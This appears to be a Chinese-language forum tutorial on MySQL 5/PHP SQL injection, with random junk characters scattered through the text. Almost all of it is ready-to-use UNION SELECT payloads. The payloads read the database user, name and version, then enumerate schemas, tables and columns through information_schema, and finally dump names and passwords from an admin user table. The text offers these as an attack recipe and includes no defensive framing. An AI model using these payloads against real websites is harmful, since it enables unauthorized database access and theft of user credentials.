$ e( r$ i- o& \8 P! N0 n教程内容:Mysql 5+php 注入" O6 q4 L5 V( Z* q+ f/ z" R
+ p9 }* n5 a! b! W$ Y8 |7 M3 b) i0 n; m' a9 Q% L( f
4 U$ H: V# e5 d) q
一.查看MYSQL基本信息(库名,版本,用户)" t b) p( t' a5 |( N, |, k
* P+ f$ G# V' l) @+ s4 x+ R
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
0 k$ s- ]0 y5 U# ?7 [! r; I, d1 W- E
二.查数据库( B+ n: B% a5 J
- U0 ]) {: Z7 [' R, |& G9 Q
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*5 O. b4 I% n/ l! T( S* ^1 [
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。- Q- _1 x' |; a# X) X
1 I6 b" k6 m6 h0 U- u# T2 V, B
三.暴表# m; }% K6 c% o6 G
2 O* c) C( D2 k5 `% Y4 B+ f" iand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
5 q$ M7 A. m2 X
, B7 C: ]8 O* s! Q; W4 ?: }( Q a4 [3 a5 [limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
8 X! S* j; x" L; S" S8 `) F+ X h& t7 Y2 z# g( Y, q3 X" R5 n
四.暴字段# z5 g; ?$ O; G+ H
7 a7 r% {# a# R7 W: D
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*) }) { |# M: _* q/ c5 e" {
% @& R, j* {+ b& w' Q! X/ Slimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。3 V7 J. k8 ^' r
. f7 z* @' G; {+ L
五.暴数据4 t& @, |" j3 R! J: A0 a! Y
, s6 z5 c% `) t9 g" Q5 d, Q) U
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*0 H# u( f+ r( U- j# x1 p
' {! h) T7 c$ F9 g j! ~2 E9 r
9 v( K6 F5 \: t- B) r' v
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。 G& r3 S Z1 P
|